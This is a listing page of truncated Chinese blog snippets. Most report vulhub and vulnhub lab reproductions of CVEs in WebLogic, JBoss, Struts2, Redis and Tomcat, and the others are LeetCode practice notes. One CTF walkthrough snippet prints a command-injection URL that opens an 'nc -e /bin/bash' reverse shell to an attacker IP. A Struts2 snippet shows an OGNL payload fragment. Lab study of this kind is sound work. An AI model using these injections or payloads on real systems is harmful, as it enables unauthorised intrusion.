vulhub刷题记录

暑假刷题记录--zhengjun

暑假刷题记录--zhengjun7月份7.17.157.167.177.187.207.227.237.247.257.277.287.297.307.318.18.38.48.58.68.88.138.148.158.168.188.198.208.21by-zhengjun7
A_zjzj·2020-08-23 00:09

cve-2018-2628 Weblogic反序列化漏洞实现反弹shell

测试机:MacBook-Air测试机IP:192.168.0.100靶机IP:192.168.0.100:7001环境:docker工具:CVE-2018-2628漏洞利用工具包下载一.环境搭建将环境vulhub
whatday·2020-08-22 19:31

Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现

环境目标(Kali):http://192.168.0.11:8080/操作机(Paroot):192.168.0.131过程下载POC:https://github.com/joaomatosf/JavaDeserH2HCPOC使用方法:攻击机下载执行执行生成二进制payload文件:javac-cp.:commons-collections-3.2.1.jarReverseShellCommo
看不尽的尘埃·2020-08-22 19:37

Apache HTTPD 换行解析漏洞(CVE-2017-15715)——漏洞复现

二、漏洞环境采用vulhub环境根据提示环境位于进入环境所在目录编译及运行漏洞环境:三、漏洞复现访问目标网站发现页面是空白的需要自己添加前端的文件上传页面,代码
银河以北,吾彦最美·2020-08-22 19:00

心脏出血漏洞复现(CVE-2014-0160)

心脏出血漏洞复现(CVE-2014-0160)环境搭建漏洞复现参考文章环境搭建启动dockersystemctlstartdocker获取vulhubgitclone--depth=1https://github.com.cnpmjs.org
whojoe·2020-08-22 18:52

每天复现一个漏洞--vulhub

phpmyadminscripts/setup.php反序列化漏洞(WooYun-2016-199433)漏洞原理:http://www.polaris-lab.com/index.php/archives/66/根据提示我们先进入到/scripts/setup.php的目录下由于configuration参数是可控的所以我们可以根据poc或自行构造然后这是我们序列化后的结果然后就复现成功了Apa
qq836869520·2020-08-22 17:15

[CVE-2017-1000353]Jenkins-CI 远程代码执行漏洞

vulhub环境搭建:cd/root/vulhub/jenkins/CVE-2017-1000353docker-composeup-d访问网址http://120.79.66.58:8080/漏洞复现
加油努力拉屎放屁·2020-08-22 17:29

CVE-2019-3396:Confluence 文件读取漏洞复现

0x02漏洞环境1.根据我过往博客安装vulhub2.cd到指定目录:cdvulhub/confluence/CVE-2019-33963.拉取并启动一个ConfluenceServer
nex1less·2020-08-22 17:36

【研究】weblogic漏洞系列XMLDecoder 反序列化漏洞(CVE-2017-10271)

weblogic漏洞系列-'wls-wsat'XMLDecoder反序列化漏洞(CVE-2017-10271)1.环境2.原理3.影响版本4.利用过程1.环境环境https://github.com/vulhub
god_zZz·2020-08-22 16:37

Apache HTTPD 换行解析漏洞(CVE-2017-15715)

2、影响版本2.4.0~2.4.293、环境搭建使用vulhub和docker搭建即可cdvulhub/httpd/CVE-2017-15715docker-composebuilddocker-composeup-d
安徽锋刃科技·2020-08-22 15:18

【计划执行报告】Day6 04-05 Leetcode上刷题的一天

05C/C++刷题的一天Day604-05Leetcode上刷题的一天1.今日感想2.计划执行报告2.1近期计划(03-31-04-12)(有改动)2.2今日计划表2.3实际时间分配3.Leetcode刷题记录
圣☆哥·2020-08-22 04:35

蓝书(算法竞赛进阶指南)刷题记录——POJ1390 Blocks(区间DP+记忆化搜索)

题目:POJ1390.题目大意:给定一个长度为nnn的序列,每次可以删除权值相同连续一段且得分为长度的平方,求最大得分.数据组数≤15\leq15≤15,1≤n≤2001\leqn\leq2001≤n≤200.按照区间DP的套路,设f[l][r]f[l][r]f[l][r]表示区间[l,r][l,r][l,r]的答案,发现根本没办法转移.考虑无法转移的原因是什么,我们发现在转移的时候,若把中间消掉
hezlik·2020-08-22 01:11

蓝书(算法竞赛进阶指南)刷题记录——POJ2176 Folding(区间DP)

题目:POJ2176.题目大意:给定一个串sss,求它压缩后长度最小的串.其中压缩是指把一个串中某些子串压成“出现次数(循环节)”的形式,如串ABABABABABABABABAB可以压成3(AB)3(AB)3(AB).1≤∣S∣≤3001\leq|S|\leq3001≤∣S∣≤300.WA这怎么可以括号套括号的啊…容易发现[l,r][l,r][l,r]要么通过子区间[l,mid][l,mid][l
hezlik·2020-08-22 01:40

$2019$ 暑期刷题记录1:(算法竞赛DP练习)

\(2019\)暑期刷题记录:\(POJ~1952~~BUY~LOW,BUY~LOWER:\)(复杂度优化)题目大意:统计可重序列中最长上升子序列的方案数。
weixin_30244681·2020-08-22 00:20

Vulhub漏洞环境使用教程

Vulhub是一个比较全面的漏洞集合,收集了近年来许多的重要漏洞,以开源的形式呈现,以docker的形式进行环境配置,提供了更简单的漏洞复现,只需要简单的命令即可实现漏洞复现。
N0Sun諾笙·2020-08-21 23:16

Redis 4.x5.x 未授权访问漏洞EXP复现过程

本次使用Vulhub一键搭建漏洞测试靶场地址:https://vulhub.org/#/environments/redis/4-unacc/搭建过程就不讲了可以看到已经启动docker了Nmap探测一下靶机端口如上图所示
桜ying·2020-08-21 22:26

Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

配置文件为\conf\web.xml利用vulhub搭建漏洞环境目录为tomcat/CVE-2017-12615环境启动成功直接构造如下expPUT/sh
努力的学渣'#·2020-08-21 22:19

Vulhub漏洞复现之ThinkPHP5.X SQL注入漏洞和敏感信息泄露漏洞

前文:名字雷同但差个n的两种类型漏洞环境靶机:vulnhub与vulhub的区别Vulhub漏洞复现之Dns域传送漏洞Vulhub漏洞复现之Django(小于2.0.8)任意url跳转漏洞(CVE-2018
努力的学渣'#·2020-08-21 22:48

Vulhub漏洞环境搭建

前提:ubuntu虚拟机中docker环境已是搭建好的第一步:下载好vulhub-master所有环境,建议直接去下载,再复制到虚拟机ubuntu中,因为在虚拟机中下载或克隆,老是下载着就断vulhub-master
银河以北,吾彦最美·2020-08-21 22:08

vulhub - IMF writeup

主机来源:www.vulnhub.com下载地址:https://download.vulnhub.com/imf/IMF.ova准备工作:下载.ova文件,直接双击即可安装成功。设置连接方式为NAT,攻击机器使用kali,也设置为NAT。发现IP刚安装的虚拟机并不知道IP地址,使用netdiscover发现IP。发现IP为10.0.3.131。端口发现发现只有80端口开着。flag1访问此站,去
一支神经病·2020-08-21 18:18

Redis 4.x5.x 未授权访问漏洞(RCE)

工具地址:https://github.com/vulhub/redis-rogue-getshell
`GGyao·2020-08-21 17:48

LeetCode刷题记录,复原IP地址(深搜+回溯)

由于IP必须有4段,且大小范围为0~255之间,所以s的长度必须在4~12之间。那么我们可以每一段可以尝试截取1~3位,至少需要保证当前剩余的数字不会超出剩余的段数的最大要求。而且截取的数字需要在大小范围内,如果这俩条件满足的话,就是一种正确的情况。classSolution{Listans=newArrayListrestoreIpAddresses(Strings){intlen=s.leng
源大郎·2020-08-21 15:48

剑指offer刷题记录——递归和循环

斐波那契数列题目描述大家都知道斐波那契数列,现在要求输入一个整数n,请你输出斐波那契数列的第n项(从0开始,第0项为0)。n<=39具体实现classSolution{public:intFibonacci(intn){if(n==0)return0;if(n==1)return1;if(n==2)return1;returnFibonacci(n-1)+Fibonacci(n-2);}};跳台阶
我想要offer·2020-08-21 13:44

剑指offer刷题记录——抽象建模能力

扑克牌顺子题目描述LL今天心情特别好,因为他去买了一副扑克牌,发现里面居然有2个大王,2个小王(一副牌原本是54张_)…他随机从中抽出了5张牌,想测测自己的手气,看看能不能抽到顺子,如果抽到的话,他决定去买体育彩票,嘿嘿!!“红心A,黑桃3,小王,大王,方片5”,“OhMyGod!”不是顺子…LL不高兴了,他想了想,决定大\小王可以看成任何数字,并且A看作1,J为11,Q为12,K为13。上面的5
我想要offer·2020-08-21 13:44

Leetcode刷题记录——剑指 Offer 21. 调整数组顺序使奇数位于偶数前面

双指针start=0end=len-1当start=end直接返回nums)否则交换顺序然后start-=1end+=1classSolution:defexchange(self,nums:List[int])->List[int]:length=len(nums)iflength<=1:returnnumsstart=0end=length-1#现在Nums[start]为最前面的奇数nums
1996MZH·2020-08-21 11:21

jboss反序列化漏洞与getshell方法学习

0x00环境搭建通过vulhub靶场环境外加docker部署环境:https://github.com/vulhub/vulhub,使用这种方法搭建需要存在docker环境和docker-compose
csdnPM250·2020-08-21 08:45

Vulhub vulnUni:1.0.1

知识点owasp-zap站点目录爬取sqlmap的使用文件上传主机发现netdiscover端口扫描nmap-A-T5192.168.80.36-oAnmap/nmapweb信息收集使用owasp-zap爬取站点获得新的站点目录登录获取shell弱口令测试,发现页面重定向echo"192.168.80.36vulnuni.local">>/etc/hostssqlmap爆破数据库爆破sqlmap-
hee_mee·2020-08-20 23:32

vulhub Brainpan:1

知识点缓冲区溢出man提权主机发现netdiscover端口扫描nmap-p---min-rate=1000192.168.80.6>portsports=$(catports|awk-F""'{print$1}'|awk-F"/"'{print$1}'|sort-n|tr'\n'','|sed's/[^0-9]*//')nmap-sC-sV-T4-p$ports192.168.80.6-oAnm
hee_mee·2020-08-20 23:32

【wikioi】1002 搭桥(dfs+最小生成树)

照着hzwer神犇的刷题记录刷!!!题解:一开始我也不会,但是我想到了直接爆搜T_T。好吧,题解。
aocong4527·2020-08-20 22:41

vulhub - Kioptrix: Level 1 (#1) writeup

主机来源:www.vulnhub.com下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar发现IP安装成功后,查找此虚拟机的IP,我使用的是netdiscovernetdiscover-ieth0-r172.21.137.0/24发现此靶机IP为172.21.137.46如果内网机器太多,可以都是用NAT模式,或者关闭靶机
一支神经病·2020-08-20 22:06

vulnhub靶机问题排查

可以kexue上网来搜索和vulhub有区别吗vulhub是漏洞环境,vulnhub是靶机网络配置为什么我的靶机不显示?vulnhub靶机很多是静态地址,所以你要分配
尸者狗·2020-08-20 22:47

Vulhub Kioptix Level 4

知识点sql注入获取非受限的shell主机发现netdiscover端口扫描nmap-p---min-rate=1000192.168.80.5>portports=$(catport|awk-F""'{print$1}'|awk-F"/"'{print$1}'|sort-n|tr'\n'','|sed's/[^0-9]*//')nmap-sC-sV-T4-p$ports192.168.80.5-
hee_mee·2020-08-20 21:23

vulhub - Kioptrix: Level 1.1 (#2) writeup

主机来源:www.vulnhub.com下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar发现IP安装成功后,查找此虚拟机的IP,我使用的是netdiscovernetdiscover-ieth0-r172.21.137.0/24找到IP为:172.21.137.47端口扫描首先去看看80端口SQL注入使用万
一支神经病·2020-08-20 21:23

Silky-CTF: 0x02 Vulhub Walkthrough

靶机地址:https://www.vulnhub.com/entry/silky-ctf-0x02,307/主机扫描:HTTP进行目录爆破尝试SQL注入会被封掉IP经过尝试发现username字段存在命令执行的漏洞我们执行进行shell反弹http://10.10.202.131/admin.php?username=nc%20-e%20/bin/bash%2010.10.202.132%2012
额头有王的喵·2020-08-20 20:00

LeetCode-每周刷题记录(2)

LinkedList237DeleteNodeinaLinkedList题目:Writeafunctiontodeleteanode(exceptthetail)inasinglylinkedlist,givenonlyaccesstothatnode.Givenlinkedlist--head=[4,5,1,9]删除给定节点。思路:直接给被删除的节点,可以直接将该指针的值指向下一个节点。19Re
hahastrong·2020-08-20 14:30

LeetCode刷题记录——第二十六题(删除排序数组的重复项)

26.删除排序数组的重复项题目描述思路分析代码实现题目描述给定一个排序数组,你需要在原地删除重复出现的元素,使得每个元素只出现一次,返回移除后数组的新长度。不要使用额外的数组空间,你必须在原地修改输入数组并在使用O(1)额外空间的条件下完成。示例1:给定数组nums=[1,1,2],函数应该返回新的长度2,并且原数组nums的前两个元素被修改为1,2。你不需要考虑数组中超出新长度后面的元素。示例2
人工智障1025·2020-08-20 03:33

LC刷题记录1

仅作学习记录只用9.回文数转换为字符串to_string函数,这是C++11新增的:C++11标准增加了全局函数std::to_string,以及std::stoi/stol/stoll等等函数(这几个就是string转int,long,以及longlong啦~)to_string这个函数还是很强大的!stringto_string(intval);stringto_string(longval)
lorenaice·2020-08-20 00:15

《面试准备》刷题记录

题目1:数组循环右移将一个长度为n的数组A的元素循环右移k位比如数组1,2,3,4,5循环右移3位之后变成3,4,5,1,2#include#include#includeusingnamespacestd;int*func(inta[],intn,intk){k=k%n;staticintb[5];if(k==0)returna;else{for(intj=0;j#includeusingnam
小白clever·2020-08-20 00:46

7.1 leetcode 刷题记录(tree)938BST、94(medium)inorder traversal、102(medium)BFS

1.巩固关于binarysearchtree(BST,二叉搜索树)的相关知识。每个node的值大于leftsubtree中所有nodes的值,小于rightsubtree中所有nodes的值。leetcode938.RangeSumofBSTGiventherootnodeofabinarysearchtree,returnthesumofvaluesofallnodeswithvaluebetw
Penelope111·2020-08-19 23:53

7.3 leetcode 刷题记录(linkedlist) 21(easy)、104(easy)、2(medium)

21.MergeTwoSortedListsMergetwosortedlinkedlistsandreturnitasanewlist.Thenewlistshouldbemadebysplicingtogetherthenodesofthefirsttwolists.classSolution{publicListNodemergeTwoLists(ListNodel1,ListNodel2)
Penelope111·2020-08-19 23:44

BUUCTF-PWN刷题记录-24 & libc-2.29学习(下)

目录[2020新春红包题]3(Tcachestashunlinkattack)hitcon_ctf_2019_one_punch(Tcachestashunlinkattack)安恒四月赛(DASCTF)sales_office2(UAF)[2020新春红包题]3(Tcachestashunlinkattack)没有开canary,莫非有栈溢出?同样把execve禁用了删除的时候有指针悬挂添加的时
L.o.W·2020-08-19 22:18

牛客刷题错题总结收集(格式为知识点-题干-解释或者知识点-具体知识点的解释)秋招看看复习下!

每篇更新十个知识点,接下来会随着本人刷题记录持续更新!
honorwh·2020-08-19 17:25

Struts2漏洞

8080Connection:closeContent-Type:%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub
caiqiiqi·2020-08-19 17:12

[蓝桥杯] 刷题记录(2020.3.8)

目录高斯日记输入输出样例输入样例输出代码排它平方数输入输出样例输入样例输出代码振兴中华输入输出样例输入样例输出代码颠倒的价牌输入输出样例输入样例输出代码错误票据输入输出样例输入样例输出代码买不到的数目输入输出样例输入样例输出代码带分数输入输出样例输入样例输出代码高斯日记源地址大数学家高斯有个好习惯:无论如何都要记日记。他的日记有个与众不同的地方,他从不注明年月日,而是用一个整数代替,比如:4210
该睡觉了zZ·2020-08-19 03:22

[蓝桥杯] 刷题记录(2020.3.22)

目录猜年龄输入输出样例输入样例输出代码切面条输入输出样例输入样例输出代码神奇算式输入输出样例输入样例输出代码扑克序列输入输出样例输入样例输出代码分糖果输入样例输入样例输出代码兰顿蚂蚁输入输出样例输入样例输出代码蚂蚁感冒输入输出样例输入样例输出代码地宫取宝输入输出样例输入样例输出代码猜年龄源地址小明带两个妹妹参加元宵灯会。别人问她们多大了,她们调皮地说:“我们俩的年龄之积是年龄之和的6倍”。小明又补
该睡觉了zZ·2020-08-19 03:51

leetcode刷题记录791-800 python版

前言继续leetcode刷题生涯这里记录的都是笔者觉得有点意思的做法参考了好几位大佬的题解,感谢各位大佬791.自定义字符串排序classSolution:defcustomSortString(self,S:str,T:str)->str:importcollectionsc=collections.Counter(T)res,l='',[]foriinc:ifiinS:l.append(i)#
思源湖的鱼·2020-08-18 23:05

leetcode刷题记录811-820 python版

前言继续leetcode刷题生涯这里记录的都是笔者觉得有点意思的做法参考了好几位大佬的题解,感谢各位大佬811.子域名访问计数classSolution:defsubdomainVisits(self,cpdomains:List[str])->List[str]:ifnotcpdomains:return[]res={}forcaseincpdomains:time,web=case.split
思源湖的鱼·2020-08-18 23:05

leetcode刷题记录801-810 python版

前言继续leetcode刷题生涯这里记录的都是笔者觉得有点意思的做法参考了好几位大佬的题解,感谢各位大佬801.使序列递增的最小交换次数classSolution:defminSwap(self,A:List[int],B:List[int])->int:length=len(A)dp_swap=[float("inf")]*lengthdp_keep=[float("inf")]*length#
思源湖的鱼·2020-08-18 23:05

leetcode刷题记录(17)-简单

1.重复叠加字符串匹配题目:给定两个字符串A和B,寻找重复叠加字符串A的最小次数,使得字符串B成为叠加后的字符串A的子串,如果不存在则返回-1。举个例子,A="abcd",B="cdabcdab"。答案为3,因为A重复叠加三遍后为“abcdabcdabcd”,此时B是其子串;A重复叠加两遍后为"abcdabcd",B并不是其子串。/***@param{string}A*@param{string}
一笑而泯·2020-08-18 23:19

leetcode刷题记录(9)-中等

1.验证二叉搜索树题目:给定一个二叉树,判断其是否是一个有效的二叉搜索树。假设一个二叉搜索树具有如下特征:节点的左子树只包含小于当前节点的数。节点的右子树只包含大于当前节点的数。所有左子树和右子树自身必须也是二叉搜索树。思路:二叉搜索树的特点是左边的子树小于根节点,右边的子树也都要大于根节点,同时每一课子树也要递归的判断。所以用一个变量记录当前子树的最小值和最大值即可/***Definitionf
一笑而泯·2020-08-18 23:19
上一页 33 34 35 36 37 38 39 40 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他